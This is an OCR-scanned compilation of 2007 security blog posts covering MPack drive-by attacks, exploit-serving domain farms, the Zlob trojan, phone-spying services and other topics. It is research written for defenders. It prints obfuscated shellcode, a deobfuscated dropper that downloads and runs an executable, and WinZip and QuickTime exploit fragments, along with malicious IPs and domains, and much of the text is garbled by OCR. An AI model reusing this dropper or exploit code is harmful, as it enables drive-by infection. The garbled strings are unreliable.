D%GA%22%25ucF9aS%25ubchFS25uaab4SZ25uB5 F3%25 ub6eas25ubab4S25u G7 F7%25ueFcocs25uefeFZ25ueFB5%25 
Su64cF%25ue7aa%25ued85%25u6 4b6s25uF 7bay22%2 O+% BDZ GAS2 2% 25uF fF O7%25ueFeFS25uB5eFS25u641 O425u 
vee85%25u64b6Z25uFf 7 baz2Suef 87 Z25uefefe25uaeefZ25ubdb4%25u Beec425u Geec%25u Beec%25uBeecs22%2 
A%22%25u 036c%25ub5eb%25u6 4b0%25u 8d35%25ubd18%25u GF 1 8%25u64ba%25ub64O3S25ue7 92425 ub264%25ub9 
CO4%25u64d3%25 uF 19bS25uec97%25ub910%22%2 + % OD GA22425 uu 996425 ueccFS25ude 10%25uab26%25u42a 
ec%2Sudcb9%25ue 819% 25uF F51%25u1dd5%25ue79b%25u212e%25uece2%25uak 1d%25ute O4S25ul 1dh4Z224%2G+% 
2%25u9ab1%25ub5 8a%25u B464%25ubS64%25 uecchS25u8932%25ues6u%25 ub bahZ25uF 3b5Z25us2ece25uebbu% 
£25ub12a%25u2db2%25uefe7Z25u 1b 87%22%2 8+ 4 ODZGNS22425u1 01 1%25ubal Oe25uasbdsZ25uaba2Z25uefaty2 
25u7 07 4%25u2F3A%25u362F S25 u2E34%25u3236%25u3 12E%25u3733%25u3 1 2ES25us934Z25u7E2F%25ub6465%25 
Su2F2F%25u6966%25 u656C%25u7 O2E%25u7 068%22%29%3B%OD% GAL O9 Var 42 Ghe aDBlLockSize%2G%3D%2 Bx 4008 


Input URL: dekalab.info 


Responding IP: 203.121.78.127 
203.121.64.0 - 203.121.127.255 
TIME Telecommunications Sdn Bhd 


Interesting enough, the original source of the IFRAME attack 58.65.239.180 remains active, 
still acting as a redirector to 64.62.137.149/ edit/ which is again an exploit embedded page 
generated with the MPack kit : 


- 58.65.239.180 
58.65.232.0 - 58.65.239.255 


HostFresh 


- alpha.nyy-web.com (64.62.137.149) 
64.62.128.0 - 64.62.255.255 
Hurricane Electric 


[3]Evasive malware embedded attacks are aiming the improve their chances of not getting 
detected. If your browser 
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v[2] = CreateObject 
(a, "WSce"+"ript.Sh"+"ell"); 
Tf (v2 ¢ 
v[2] = CreateObject 
fa, “"Shel"+"1 .ap"+"pl"+"icati™+"on").; 
if (v[2].)} n=15 
} 


if (v[O]) ¢& v[1]) && v[2]) ¢ 


var data = XMLHttpDownload(v[O], urlRealExe); 
if (data '= 0) { 
var name = "c:\\sys"+GetRandString(4)+".exe"; 
if (ADOBDStreamSave(v[1], name, data) == 1) { 
if (ShellExecute(v[2], name, nj) == 1) { 
ret=1; 


cannot be exploited all you will see at these IPs/URLs is a :[ sign, the rest is the obfuscated 
javascript attack you can see in the screenshot. WHere’s the deobfuscated reality as well. 
Periodically monitoring these IPs will result in a great deal of undetected malware variants. 
AVs detecting the current payload 


eTrust-Vet - [4]Win32/Chepvil! generic 


File size: 7283 bytes 


MD5: ae4e60d99ec198c805abdf29e735fla7 


SHAI1: b0d1b68460683d98302636ab16a0eaa4b579397d 


[5]Aruba.it’s comments on the case as well. Now, let’s move on, shall we? 


1. http://tailrank.com/2137563/MPack-Packed-Full-of-Badness 


2. http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 
3. http://www.cs.jhu.edu/%7Emoheeb/webpage_files/RAIDO6-final. pdf 


4. http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=6120 


5. http://community.aruba. it/forums/ultimatebb.php?ubb=get_topic ;f=58 ; t=000218 
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3.6.15 Cell Phone Stalking (2007-06-25 14:54) 


| | 
All Voice SMS | email Woestier System Search Download My Profile 


You have one or more subscription which is not yet activated. 


ALL EVENTS 1 - 10 of 189records Row Per Page 


t 


Taam wi 


| 


Almunge kyrkby 
Almunge kyrkby 
Almunge kyrkby 


test 


22/03/07 01:15:23 
2203/07 01:15:23 
220307 01:15:23 
19/03/07 02:54:20 
19/03/07 02:54:20 
19/0307 02:54:20 
19/03/07 02:54:20 
19/03/07 02:54:20 
1227 14:53:08 


12/02/07 14:53:08 


31/12/63 16:00:00 
31/12/63 16:00:00 
31/12/69 16:00:00 
31/12/63 16:00:00 
31/12/69 16:00:00 
31/12/63 16:00:00 
31/12/69 16:00:00 
31/12/63 16:00:00 
31/12/63 16:00:00 


31/12/63 16:00:00 


F- 


cs 
1 | 
= 
+ | 
1 | 
+ | 
1 | 
t | 
1 | 
t | 
+ | 
x 


First | Previous |1 [2] 3] 4] SJ Next]! 


Six year olds [1]install hardware keyloggers at the U.K’s Parliament , and now as you can 
listen to the sweet sixteen’s voice in this video, they also know how to take advantage of 
[2]commercially available cell phone snooping services such as [3]Flexispy for instance : 


"Just ask Tim Kuykendall, whose cell phone provided a portal through which a hacker gained 
access to the most intimate details of his life, recording family members’ conversations and 
snapping pictures of what they were wearing. “We’ve had [times] where I’m having a conver- 
sation in my home and | get a voice mail and the conversation’s replayed; received a phone 
call or even checked my voice mail from a message and while 1 push ’OK’ to listen to [it] I’m 
hearing a conversation going on in the living room between my daughter and my wife,” he told 
FOX News." 


The successful surveillance however, doesn’t make him a hacker, rather a customer of a 
product, but what’s worth considering is how did he manage to infect their cell phones at 
the first place, namely socially engineering them remotely, or physically infecting the mobile 
device. Meanwhile, Flexispy is continuing its [4]compatibility efforts among popular Symbian, 
Symbian 9, Windows Mobile, and BlackBerry devices, aiming to strengthen its position as 
mobile device activity monitoring solution for some, and cell phone stalking service to others 
- two-sided copywriting messages aim to convince those who might be eventually opposed to 
the idea. 


Related posts: 
[5]USB Surveillance Sticks 
[6]Outsourcing the Spying on Your Wife 


1. http: //ddanchev. blogspot .com/2007/03/ghosts-in-keyboard.htm 
2. http://www. foxnews.com/story/0, 2933, 286440, 00.htm 
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3. http://www.flexispy.com/spyphone-remote-listening-symbian.htm 


4. http://www.flexispy.com/checkphones. jsp 
5. http://ddanchev.blogspot.com/2007/03/usb-surveillance-sticks.htm 


6. http: //ddanchev. blogspot .com/2007/04/outsourcing-spying-on-your-wife.htm 


3.6.16 Security Comic Strips (2007-06-25 15:40) 


[1] * Ifallrestis a commodity but attitude, let me introduce you to the first two additions from 
my new [2]Unstripped Security comic strips series to be expanded on a weekly basis. Strip One 
- [3]The Blackberry Espionage Saga presenting the irony in the International Intelligence Com- 
munity, and Strip Two - [4]lt’s All a Matter of Perspective discussing the different perspectives 
of commonly stereotyped participants during a malicious Internet attack. Feel free to email 
and embed them within your thoughts, blogs and sites, include a backlink to [5]Unstripped 
Security, and subscribe to the [6]RSS feed to get notified on the latest strips. Enjoy! 


1. http://static.stripgenerator.com/generated/ddanchev/strip/2007/06/24/its-all-a-matter-of-perspective. png 


http: //ddanchev.stripgenerator.com/ 


2. 
3. http: //ddanchev.stripgenerator .com/2007/06/22/the-blackberry-espionage-saga.htm 


4. http://ddanchev. stripgenerator.com/2007/06/24/its-all-a-matter-of-perspective.htm 


5. http: //ddanchev.stripgenerator.com/ 
6. http: //ddanchev.stripgenerator.com/feed/ 


3.6.17 Early Warning Security Event Systems (2007-06-26 20:16) 


Bleeding Snort Table 
BLEEDING-EDGE WORM Allaple ICMP Sweep Ping Inbound 2291 1902 
BLEEDING-EDGE WORM Allaple ICMP Sweep Reply Outbound 2280 861891 
BLEEDING-EDGE EXPLOIT MS04-007 Kill-Bill 4561 exploit attempt 3376 631 
WEB-IIS view source via translate header 3659 726 
BLEEDING-EDGE EXPLOIT Symantec Remote Management RTVScan Exploit 4717 636 
BLEEDING-EDGE EXPLOIT x86 PexFnstenvMoy/Sub Encoder 3986 599 
ICMP PING Cyberkit 2.2 Windows 1015 579 
ATTACK-RESPONSES Microsoft cmd.exe banner 1490 494 
MS-SQL version overflow attempt 6312 429 
MS-SQL Worm propagation attempt 6313 429 
NETBIOS DCERPC TActivation little endian bind attempt 2722 263 
NETBIOS DCERPC Remote Activation bind attempt 2722 263 
NETBIOS SMB-DS IPC$ unicode share access 1385 251 
NETBIOS SMB-DS Session Setup NTMLSSP asni overflow attempt 457 241 
NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt 1219 226 
ICMP PING NMAP 265 218 
SHELLCODE x86 NOOP 1059 215 
BLEEDING-EDGE EXPLOIT LSA exploit 1048 205 
BLEEDING-EDGE EXPLOIT MS04011 Lsasrv.dll RPC exploit (WinXP) 1052 202 
NETBIOS DCERPC ISystemAéctivator path overflow attempt little endian unicode 1641 180 


Years ago, early warning systems for security events used to be a proprietary service available 
to a vendor’s customers only, or even worse, to the vendors themselves. But with more 
vendors realizing the marketing potential behind viral marketing, and the need for more 
transparency on the state of Internet attacks, nowadays such EWS’s are either publicly 
available at a vendor’s site, or accessible due to the emerging CERT-ization and aggregation 
of honeypot data on a coutry level courtesy of the local CERTsS themselves. And such is the 
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case with [1]ARAKIS : 


"an early warning system operated by CERT Polska. ARAKIS aggregates and correlates 
data from various sources, including honeypots, darknets, firewalls and antivirus systems in 
order to detect new threats. The dashboard provides a snapshot of activity on the Internet 
based on data gathered from a selected group of sensors." 


PING sweeps dominate the local threatscape? As always, nobody likes shooting into the 
dark unless of course they really have to. Several more publicly available early warning 
systems for security events worth considering are: 


[2]ATLAS: Active Threat Level Analysis System 
[3]CipherTrust’s Real-Time PC Zombie Statistics 
[4]WatchGuard’s Real-Time Spam Outbreak Monitor 
[5]ProjectHoneypot’s Spam Harvesting Statistics 


as well as several malware outbreaks related early warning systems:[6] 


[7]Trend Micro’s Virus Map[8] 
F-Secure’s World Map[9] 
PandaSoftware’s Virus Map[10] 
McAfee’s Virus Map 


As far as any other non IT security incident on a worldwide scale is concerned, the [11]Global 
Map of Security and Terrorist Events, maps the "big picture". The syndication of such publicly 
available data into [12]a central dashboard is nothing new, [13]but with so many [14]CERTs 
in Europe the next big milestone to be achived should be to first integrate the data between 
themselves, share with vendors and vice versa, and then communicate the big picture for 
industry insiders and outsiders to see. An effort which could really undermine the commercial 
EW systems, ones whose business model is getting outdated with every day. 


The FBI’s recent "[15]Operation Bot Roast" not only reminds me of [16]the Wardriving 
Police who will wardrive and leave you flyers that [17]you’re vulnerable, but also that when 
proactive measures cannot take place post-event ones dominate - "Dude, you’re malware- 
infected and sending spam and phishing emails to yourself!" - not exactly what pragmatic is 
all about : 


" OPERATION BOT ROAST is a national initiative and ongoing investigations have identi- 
fied over 1 million victim computer IP addresses. The FBI is working with our industry partners, 
including the CERT Coordination Center at Carnegie Mellon University, to notify the victim 
owners of the computers. " 


One thing I’ve learnt about end users, either [18]educate and evaluate the results, or di- 
rectly enforce practices leaving them with no other option but to stay secure by default. 
Most importantly, with major U.S based [19]ISPs sending out spam, thus having the largest 
proportion of infected customers are publicly known. So instead of giving out anti virus tips, 
cooperate with ISPs on the concept of filtering outgoing soam messages, and DDoS attacks. 


With [20]malicious economies of scale, that is botnet masters [21]automating the entire 
[22]process of exploiting unpatched PCs, using [23]old-school social engineering attacks 
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taking advantages of opened up "event windows", [24]packing and crypting their malware to 
exploit the flows in the current signatures-based detection hype - is such an initiative really 
worth it? Time will show, but what could follow are fake FBI emails telling everyone that they’re 
infected, a little something about the operation itself, and how visiting a certain [25]malware 
embedded web site will disinfect your PC the way [26]we’ve seen it happen before. 


. http://arakis.cert.pl/en/index.htm 
. http: //atlas.arbor.net/ 


ttp://ddanchev . blogspot. com/2006/06/real-time-pc-zombie-statistics.htm 


ttp://ddanchev. blogspot .com/2006/10/real-time-spam-outbreak-statistics.htm 
ttp://ddanchev.blogspot.com/2006/09/email-spam-harvesting-statistics.html 


. http: //www.trendmicro.com/map/ 
. http://www.trendmicro.com/map/ 


ttp://worldmap.f-secure.com/ 
ttp://www.pandasoftware.com/virus_info/map/map. ht: 
10. http://www.mcafee.com/anti-virus/virusmap.asp 
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ttp://ddanchev. blogspot .com/2006/11/global-map-of-security-incidents-and. htm 


. http://www.certstation.com 


ttp://photos1.blogger .com/blogger/1933/1779/1600/Europe_CERTs. jpg 


ttp://www.enisa.eu.int/doc/pdf/deliverables/enisa_cert_euromap_v1_2060210. pdf 


. http://www. fbi.gov/pressrel/pressrel07/botnet061307. htm 
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ttp://ddanchev. blogspot .com/2006/06/wardriving-police-and-pringles-hacking. htm 


ttp://photos1.blogger .com/blogger/1933/1779/1600/wardriving_pringles. png 
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ttp://security.isu.edu/pdf/security-policy.pd 
ttp://www.spamhaus.org/statistics/networks.lasso 
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ttp://ddanchev. blogspot .com/2007/06/mpack-kit-attack-on-video.htm 
ttp://ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 
ttp://ddanchev. blogspot .com/2007/06/diy-malware-droppers-in-wild.htm 
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: isu. ity- icy .pdf 
. http://ddanchev. blogspot . com/2007/03/underground-economys-supply-of-goods.htm 
21. http://ddanchev.blogspot .com/2007/05/webattacker-in-action.htm 
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ttp://ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


. http://news.bbc.co.uk/1/hi/technology/4466016.stm 


N 
fo) 


911 


3.6.18 Exploits Serving Domains (2007-06-27 11:48) 


<div id="mydiv"></div><Script Language="JavaScript’> function xor_str(plain_str, xor_key){ uv 
xored_str = ">; for (var i = 6 5; i < plain_str.length; ++i) xored_str += 
String.fromCharCode(xor_key ~ plain_str.charCodefAt(i)); return xored_str; } var plain_str = 
“NX TO\XSA\KSAaLKSG\ XSAN KSO\ KS TV K42\K1 OV XSA\XSd\K TOY X Bd) x1 O\xSe\xSS\ X47 \KTOVK7 TV KH2\KE2\K5T\K4 
\X1T9\ xX OD\XSd\KSa\KYGNKS1\K42\K1 OV XSALKSSVXSA\KGFAXSO\KSC\XK5S1\X57\X1 OY x Od x1 O\ x BBY x Ob\x3d\x3a 
KSaVKSO\ KS xSe\KSS\ Kha xSO\xSFLxSey\ x1 OVxS8\x1B\x19\ x1 OV xeD\ xSd\ xSd\ x Bd \ xSd\xSa\xOb\x1B\x4a3\ 
SUN KON KSO\KSA\KSS\KSE\ KES XGG\ xIB\XT2\xS8\x1B\x19\x12\x10\x1 OV x 82) x OB) x BB) x GO\x19\x Ob\x4d\x 
A\XSd\xSa\xKSG\KNS VL xSeVxS3\ KGa xSO\xSF\xSey xd OyxS7 x55 \xGa\ xS2\x1B\xS2\ x ICV xT OV xS2\x63\x59\ xu 
\xT9\xSd\xSa\xeD\xh7\xS8\xS9\xSc\xSS\x1B\x1B\xS2\xte\xSc\ x55 \xSe\xS7\x4e\xS8\x1a\x62\x bc, x52 
x59\x4a\xSS\x19\xsb\x52\x1 O\x1b\x Od\ x1 O\xS2\x Ob\ xsd \ x3d\xFa\x52\x1B\x Gd\ x1 O\xS2\xteyxsa\xssy 
S3\x4S4\x42\x59\xSe\x57\x18\x OB\x 1c \ x5 2\x63\x59\ xha\ x55 \ x1 F\ x O2\x19\ x OD\KN2\xSS\ KES) KES \XS2\x 
B\x52\x Gb\x4d\x3d\xda\xId\xFa\x56\ x45 \xSe\xS3\xsay xS9\ xSF\xSeyx1O\xS3\xS6\x 1B x19\x3d\xda\x4 
\K51\%42\x16\x4a\x53\x1 B\x Od\ x1 O\ x BO\X48\ x BB\X53\ x BB\x53\x BO\xX53\x GO\x53\x ObD\x3d\xIa\x46\x51 
X1TO\X51\X1O\x BG\ XT BV X4S5\xSe\x55\ x43 \x53\K5 1X4 B\x55\ x 1B) K12\ X15 \ X45 \ x B4\ x O3\ x BH x B3\K15\ x45) 
63\x B4\ x O3\x%15\K45\x BBY xS6\xX55\x52\xX15\ X45) x O3\ x O3\ x OS \ X52) x15) xX45\x B6\x BO\XS3\ x B9\ X15 \x45\x 
B\X5S2\XB9\X15\X45\x OB) x BB) x OB) x O1\ X15 \ X45 \ X55 \ x56) x B3\ x B3\X12\X1 OV XID\XSA\XSa\KT2Z\K 1S \ X45 \ x5 
\X BAX OS\KIS\KYS\KSS\KS2\x56\K51\X15\ X45) x55\ x OBL x BBY x OS \ X15 \ X45 \xS6\K5SOVKSS\XSSLK 1S \ X45 \ x56 
XSO\X5S6\K1S\KNS\ x OBL KS2\KO7\XSO\K1S\ KES XSUYKS6\ x BUY XS5S\ X15 \ KES xXSS\KSO\ RSS KSOLKIS\ X45 \x 86) 
SS\XSG\K1S\KNSAKSS\ x OSV x5 1\K56\K15\ x45 \ x BO xS6\ x B6\ x BUY X15 \ X45 \ x BU x B2\x5S6\KO3\K1S\KUS\ xX B9\x 
BAX BU\XISA\K4S\ x G6\XSS\KS5\ x B7\xK1S\ KES \xSS\x5S6\x BBY xX OSV x15 \ x45 \x55\xS6\xKSS\xS2\K72\x1 BX ID\ x3 
\XT2\ x15 \x45\x 66\ x O4\xS5\x56\xK15\ x45 \x52\ x B9\ x BB\ x O3\x15\x45\ x O6\xO1\x OB xX O7\x15\x45\x55\x 81 
x O1\x15\x45\x BB\x B7\ x OB\ x O3\ x15 \ x45 \xS5\xS6\x O1\ x O1 x15 \ KES x55 \xS6\KSS\KSG\K1S\KhS\xS1\x51\ 
B6\x15\x45\x52\x O9\x55\x52\x15\x45\x O7\x G7 \x OB\ x O7\x%15\ x45 \x 86\ x O5\ x O1\x O1\x15\x45\x OB\x 87 \x 
TNVK1TS\K4SS\xS5S\x56\x O1\x56\ x15 \ x45 \ x55) x56 \x55\x56\%15\ x45) x51) x51) x B6\x G6 \X1S\KS5\x52\ x O9\xS 
\X12\x%16\x1D\x3d\x3a\x12\x15\x45\x53\x51\x GB\ x B7\ x 15\ x45 \x 81\ x GO) x O5\x56\x15\x45\x OB\x 87\x G2 
X15\X45\x55\x56\x BBV xXS4H\ x15 \ x4S5 x55 \xS6\ x55 \ x56) 15) X45 x51) %51\ x B6\ x BO \ KIS \KES\KS2\ x O9\xS5\ 
15\x45\x 66\x 6O\x 68\ x 67\x15\x45\ x OO\x56\x G2\x O1\xK15\ 45 \ x OB) x O7\ x BB\XSG6\K1IS\ x45 \x55\x56\x03\x 
S\K4SS\XSS\XSO\RSS\KSO\K 15) X45) X51) X51) % G6 \ x BOK 1S\ X45) X52) x B9\ XS6\XSO\KIS\K4S\ x O2\x55\x O8\ xd 


More cyber leads from the previous [1l]lanalysis of Mpack embedded [2]dekalab.info with a 
particular [3]malicious domains farm emphasis as follows. Multiple redirectors, blackhat SEO, 
XOR-ifying javascript obfuscation and a piece of rootkit installed, pretty much everything’s in 
place as usual. The majority of redirectors are part of an [4]exploit serving domains farm. The 
whole process starts from trancer.biz : 


trancer.biz/sys/index.php 


81.95.149.176 
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function startWinzip (object) 

{ 
var xh = 'A'; while (xh. length < 231) xht='a'; 
xht="'xOc\ xOc} xOc\ xOc}xOc} xOc)\xOc"; 
object.CreateNewFolderFromMName (xh) ; 

} 


function startOverflow(num) 
{ 
if (num == 0) { 
tert 
Var qt = new ActivexObject 
('Quick' +' Time. Qu'+' ickTime' } ; 
TEAtqe. 
var qthtml = '<object 
CLASSID="clsid: O2BF25D5-68C17-4B23-BCS80-D3456GaBDDC6B" width="1" height="1" 
style="border:Opx">'+ 
'<param name="sre" value="qt.php">'+ 
'<param name="autoplay” value="true">'+ 
'<param name="loop” value="false">'+ 


HTTP/1.1 302 Found 

Server: nginx/0.5.17 

Date: Tue, 26 Jun 2007 11:51:30 GMT 
Content-Type: text/html 
Transfer-Encoding: chunked 

Connection: keep-alive 

Location: cawajanga.biz /ts/in.cgi?oscorp 


HTTP/1.1 302 Found 

Server: nginx/0.5.17 

Date: Tue, 26 Jun 2007 11:51:31 GMT 
Content-Type: text/html 
Transfer-Encoding: chunked 
Connection: keep-alive 

Location: blooded.biz /2103/index.php 
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AhnLab-V3 2007.6.21.1 06.25.2007 |no virus found 

Antivir 7.4.0,.34 06.25.2007 |RKit/Agent.FB.5 
Authentium 4.93.8 06.22.2007 |no virus found 

Avast 4.7,.997.0 06.24.2007 |no virus found 

AVG 7.5.0.476 06.25.2007 |BackDoor.Generic? JPR 
BitDefender eae 06.25.2007 |no virus found 
CAT-QuickHeal 9,00 06.23.2007 |Rootkit.Agent.fb 
Clamay devel-20070416 06.25.2007 |no virus found 

Driveb 4.33 06.25.2007 |Trojan.DownLoader.24677 
eSafe 7.0.15.0 06.24.2007 |no virus found 
eTrust-Vet 30.8.3741 06.25.2007 |Win32/Chepvil!l generic 
Ewido 4.0 06.25.2007 |Rootkit.Agent.fb 
FileAdvisor 1 06.25.2007 |no virus found 

Fortinet 2,91.0.0 06.25.2007 |W32/Agent.FB!tr.rkit 
F-Prot 4.3.2.48 06.22.2007 jno virus found 
F-Secure 6.70,13030.0 06.25.2007 |Rootkit.Win32.Agent.fb 
Ikarus 7T3.1.1.8 06.25.2007 |Rootkit.Win32.A4gent.fb 
Kaspersky 4.0,.2.24 06.25.2007 |Rootkit.\Win32 Agent.fb 
McAfee 5059 06.22.2007 |no virus found 
Microsoft 1.2701 06.25.2007 |no virus found 
NOD32v2 2351 06.25.2007 |Win32/TrojanDownloader.Nurech.NBG 
Norman 5,80,02 06.22.2007 |W32/Rootkit. AGY 
Panda 9,0.0.4 06.24.2007 |Suspicious file 

Prevx V2 06.25.2007 |no virus found 

Sophas 4.19.0 06.24.2007 |no virus found 

Sunbelt 2,2,907.0 06.21.2007 |no virus found 
Symantec 10 06.25.2007 |no virus found 
TheHacker 6.1.6,137 06.22.2007 |Trojan/Agent.fb 

VBA32 3.12.0.2 06.25.2007 |Rootkit.wWin32 Agent.fb 
VirusBuster 4.3.23:9 06.24.2007 |no virus found 
Webwasher-Gateway 6.0.1 06.25.2007 |Rootkit.Agent.FB.5 


Then we get redirected to blooded.biz ’s obfuscated payload 


81.95.149.176 in between loading cawajanga.biz /ts/in.cgi?oscorp and mobi-info.ru where the 
deobfuscated XOR-ifying javascript leads us to the exact payload location the output of which 
is in the form of Rootkit.Win32.Agent.fb 


File size : 7503 bytes 


MD5 : 09994afd14b189697a039937f05f440f 


SHA1 : b9832689aa1272f39959087df41ceal3fc283910 


1. http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


2. http: //ddanchev. blogspot .com/2007/06/mpack-kit-attack-on-video. htm 


. http://209.85.135.104/search?q=cache : Ho-OuB5JSaMJ : www. accessbyremote.com/AccessByRemote/+trancer .bizkhl=en 


3.6.19 Post a Crime Online (2007-06-28 14:01) 


Crime Location: 
MAT Bank 
6434 Georgia Ave NW 


Washington DC DC 20066 


Date of Crime: 05-14-2007 


Description: 
Suspect is described as a black male, 35 to 40 years of age, 5'10" to 600", 170 Ibs to 180 
lbs,, black dread locks wrapped in black and gold scarf 


Type of crime: Bank Robbery 


Reward: 
The following reward is offered by the poster of this crime for information leading to an 
arrest and/or recovery of stolen goods 


Reward Amount: TBD 
Reward Type: Cash 


Remember this Crime Submit a Tip Flag as inappropriate Print this Crime 


In exactly the same fashion of [1]Chicago’s Crime Database, a community powered site 
integrating crime reports on Google Maps, [2]Postacrime.com aims to empower police officers 
with citizen submitted crimes in progress : 


"POSTACRIME.COM is a free service for anyone to upload photo or video content of bur- 
glary, theft, vandalism, or other criminal acts that have been caught on camera for the 
purpose of identification by the public. Often times Law Enforcement is unable to apprehend 
criminals, even if with the best video evidence, because no one is able to identify the criminal 
caught on camera. POSTACRIME.COM hopes to change that." 


If the site reaches YouTube’s popularity by disintermediating police forces ongoing intes- 
tigative efforts, it could also act as an early warning system for the criminals themselves, 
especially to change areas of operation. The site is pitching itself as the World’s Largest Crime 
Prevention Network, a bold vision despite that | find it as an informediary categorizing user 
submitted crimes and hoping the publicity will help identify and criminal and hopefully restore 
the stolen goods - you wish. You cannot prevent crime Web 2.0 style at least not in this way, 
you can [3]Jaggregate publicly available crime data and present a (heat) map of a certain 
location based on a specific time for trends analysis. 


1. http://www. chicagocrime.org/ 
2. http://www.postacrime.com/ 
3. http://www.chicagocrime.org/map/ 
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3.6.20 Exploits Serving Domains - Part Two (2007-06-29 16:05) 


AhnLab-V3 2007.6.29.0 06.29.2007 rus f ) 

Antivir 7.4.0.37 06.29.2007 |DR/Didr.Zlob.bwa.8 

Authentium 4.93.8 06.27.2007 D virus found 

Avast 4.7.997.0 06.27.2007 |no 

AVG 7.5.0.476 06.28.2007 rus found 

BitDefender z= 06.28.2007 |Trojan.Zlob.BQW 

CAT-QuickHeal 9,00 06.27.2007 rus foun 

ClamAay devel-20070416 06.29.2007 und 

DrWeb 4.33 06.29.2007 |Trojan.Popuper 

eSafe 7.0.15.0 06.27.2007 uN 

eTrust-Vet 30.8.3747 06.28.2007 

Ewido 4.0 06.27.2007 r found 

FileAdvisor 1 06.29.2007 found 

Fortinet 2.91.0.0 06.28.2007 |\W32/Zlob.Altr.didr 

F-Prot 4,3.2.48 06.27.2007 rus found 

F-Secure 6.70.13030.0 06.29.2007 |Trojan-Downloader.\Win32.Zlob.bwa 
Ikarus 7T3.1.1.8 06.29.2007 un 

Kaspersky 4.0.2.24 06.29.2007 |Trojan-Downloader.\Win32.Zlob.bwa 
McAfee $062 06.27.2007 r und 

Microsoft 1.2701 06.28.2007 r und 

NOD32v¥2 2360 06.28.2007 |Win32/TrojanDownloader.Zlob.AYN 
Norman 5.80.02 06.27.2007 |DNSChanger.geniO 

Panda 9.0.0.4 06.29.2007 rus found 

Sophos 4.19.0 06.24.2007 |Mal/Zlob-4 

Sunbelt 2.2.907.0 06.27.2007 |r 5 found 

Symantec 10 06.29.2007 |r 

TheHacker 6.1.6.140 06.28.2007 

VBA32 3.12.0.2 06.27.2007 |; 

VirusBuster 4.3.23:9 06.27.2007 rus found 
Webwasher-Gateway 6.0.1 06.29.2007 |Trojan.Didr.Zlob.bwa.8 


The saying goes that there’s no such thing as free lunch, so let me expand it - there’s no such 
thing as free prOn, unless you don’t count a malware infection as the price. What follows is a 
demonstration of the Zlob trojan in action that occurs though the usual redirectors, and here’s 
a related article emphasizing on the [1]IFRAME embedded prOn sites directing traffic to the 
redirectors : 


"Right now, we are not sure whether the porn sites are compromised to host the 
IFRAMES, are created to do so or are being paid to host the IFRAMES," acknowl- 
edged Trend Micro. The attack probably began June 17, the company said. Other 
researchers have continued to dig into the Mpack-based attacks and have shared some of their 
findings. Symantec Corp., for instance, asked how hackers were able to infect so many sites 
in such a short time and how they could inject the necessary IFRAMES code - the malicious 
code they added to the legitimate sites’ HTML that redirected visitors to the Mpack server - 
so quickly." 


Psst - they are hosting the IFRAMES, whether compromised or equal revenue sharing among 
the parties is [2]a question of another discussion. The attack is quite widespread in the time 
blogging, check for yourself to get [3]a full listing of all the IFRAME-ed prOn sites in question. 
Let’s dissect the central hosting locations where all other sites ultimately lead to. 


At miss-krista.info - 66.230.171.36 - we have an IFRAME pointing us to todaysfreev- 
ideo.com/ad/6811214.html - 81.0.250.239 - where we are offered to download two prOn videos, 
todaysfreevideo.com/teens/mr-tp01-2g2s1/1/moviel.php and todaysfreevideo.com/teens/mr- 
tp01-2g2s1/1/movie2.php, but the actual malware is hosted at an internal page at download- 


916 


vax.com - 85.255.118.180 - and while as usual we get a 403 Forbidden at the main index, 
within to domain the prOn surfer gets infected with the Zlob Trojan. 


File size: 70853 bytes 


MD5: 009ca25402ee7994977f706b96383af0 


SHA1: ab60ecefcf27420a57febd5c8decc5c9f34f0e74 


packers: BINARYRES 


Obviously, unsafe prOn surfing leads to malware transmitted diseases, but why exploit serving 
domains when no vulnerabilities get exploited at these URLs? Mainly because miss-krista.info 
is part of the exploits hosting domain farm | discussed in part one. 


Related posts: 


[4]Exploits Hosting Domains 


[5]The MPack Kit Attack on Video 


[6]Massive Embedded Web Attack in Italy 


[7]Testing Anti Virus Software Against Packed Malware 


. http://www. computerworld.com/action/article.do?command=viewArticleBasickarticleId=9025578 


. http: //ddanchev.stripgenerator . com/2007/06/24/its-all-a-matter-of-perspective.htm 


. http://ddanchev. blogspot .com/2007/06/exploits-serving-domains .htm 
. http: //ddanchev.blogspot.com/2007/06/mpack-kit-attack-on-video.htm 


6. http: //ddanchev. blogspot . com/2007/06/massive-embedded-web-attack-in-italy.htm 


1 
2 
3. http://www.google.com/search?hl=en&q=www.todaysfreevideo.com/ad 
4 
5 


7. http://ddanchev. blogspot .com/2007/01/testing-anti-virus-software-against .htm 
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3.7 July 


3.7.1 Mujahideen Harvest Magazine - Issue 41 (2007-07-04 13:47) 


Compared to [1]the quarterly released [2]Technical Mujahid E-zine, the yearly updated 
[3]Jinadist Security Enclopedia, or the regularly updated [4]terrorism glorifying blogs, the 
Mujahideen Harvest magazine is released monthly, and represents a complete account of 
mujahideen activities in Iraq, featuring successful attacks and coming up with top 20 lists of 
the best explosions. It’s latest issue 41 is 45 pages long, and details the strategies and events 
related to each attack in a daily like journal entry. This magazine (Mujahideen Harvest) is 
100 % conventional warfare achievements related, and from an [5]OPSEC perspective, is an 
indispensable account into each and every attack that occurred in between the last and the 
current issue was released from the perspective of the mujahideen militants. Some more info 
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on the "[6]publishing house" that’s been releasing it : 


"The Mujahideen Shura Council is an umbrella organization of a number of 


different Islamic terrorist groups active in Iraq, attacking U.S. and coalition forces. For some 
time, they have been issuing monthly printed reports in Arabic about their “successes” against 
U.S. forces. Almost without exception, these reports are pure Islamic propaganda and issued 
to rally the terrorists fighting in the Iraqi theater. The statistics they provide are usually inflated 
and frequently used by other terrorist groups and once translated, are often cited by anti-war, 
anti-U.S. groups to sway public opinion. For their October report, they made it easier to attract 
Western sympathizers." 


1. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 
2. http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.htm 
3. http://ddanchev. blogspot .com/2007/05/jihadist-security-encyclopedia.htm 


4. http://ddanchev. blogspot . com/2007/06/list-of-terrorists-—blogs.htm 
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5. http: //en.wikipedia.org/wiki/Operations_security 
6. http://www. canadafreepress.com/2006/terror111806.htm 


3.7.2 Hacking the iPhone (2007-07-05 15:35) 


WELL THEY SAY THAT iT WiLLDO 
EVERYTHING... 


